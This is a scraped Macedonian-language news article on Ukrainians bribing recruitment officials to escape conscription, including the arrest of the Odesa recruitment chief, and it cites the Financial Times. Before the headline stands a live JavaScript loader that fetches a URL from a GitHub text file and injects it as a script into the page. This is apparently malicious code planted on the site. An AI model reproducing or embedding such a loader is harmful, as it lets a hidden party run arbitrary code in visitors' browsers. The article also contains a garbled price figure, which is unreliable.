;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Украинците плаќаат и до 10.000 долари за да избегнат регрутација - Антропол
АктуелноИнтернационално

Украинците плаќаат и до 10.000 долари за да избегнат регрутација

Илјадници Украинци платиле големи суми како мито за да избегнат да бидат повикани во воена служба во тековниот конфликт, објави Financial Times.

Веста доаѓа откако украинскиот претседател Владимир Зеленски започна масовна воена чистка, и наведувајќи ги повеќекратните корупциски скандали што ја потресуваат земјата. Според планот на Киев, сите службеници за регрутирање треба да бидат заменети со борбени ветерани.

Во текот на тековниот конфликт, илјадници Украинци успеаја да избегаат од регрутација преку различни шеми на корупција. Киев им забрани на мажите на возраст меѓу 18 и 60 години да ја напуштат земјата уште кога првпат се воведе воена состојба, во февруари 2022 година. Но овој потег само само ја поттикна корупцијата. Една од најпопуларните опции беше едноставно купување документи за медицинско ослободување за околу 6.000 долари, објави весникот, повикувајќи се на наодите од истрагата за корупција на украинските власти.

Илјадници Украинци, исто така, се обиделе илегално да ја напуштат земјата, при што околу 13.600 биле фатени во близина на граничните премини, а други 6.100 биле фатени на контролни пунктови со лажни документи.

Шефот на регионалниот центар за регрутирање во Одеса, Евгениј Борисов, кој беше уапсен минатиот месец, се покажа дека е еден од „најплодните“ функционери вмешани во рекет за избегнување на регрутација. Службеникот сега е осомничен дека примил повеќе од неверојатни 5 милиони долари мито, наплаќајќи од 2.000 до 10.000 долари по лице за различни „опции“ да избега од службата. Се верува дека Борисов ги користел незаконски стекнатите пари за да го финансира отмениот начин на живот, при што неговото семејство набавило вила вредна 4,6 долари во Шпанија минатиот декември, како и други луксузни средства, според украинските истражители.

Освен тековните корупциски скандали, украинските напори за регрутација беа нарушени и со насилните дејствија што ги правеа регрутните службеници. 

Повеќе видеа покажуваат дека офицерите за регрутација бркаат случајни мажи на улиците за да им дадат известување за регрутација, насилно ги приведуваат, па дури и ги тепаат потенцијалните војници. Многу од овие регрути, биле убиени на линијата на фронтот само неколку дена откако биле „регрутирани“ на таков начин.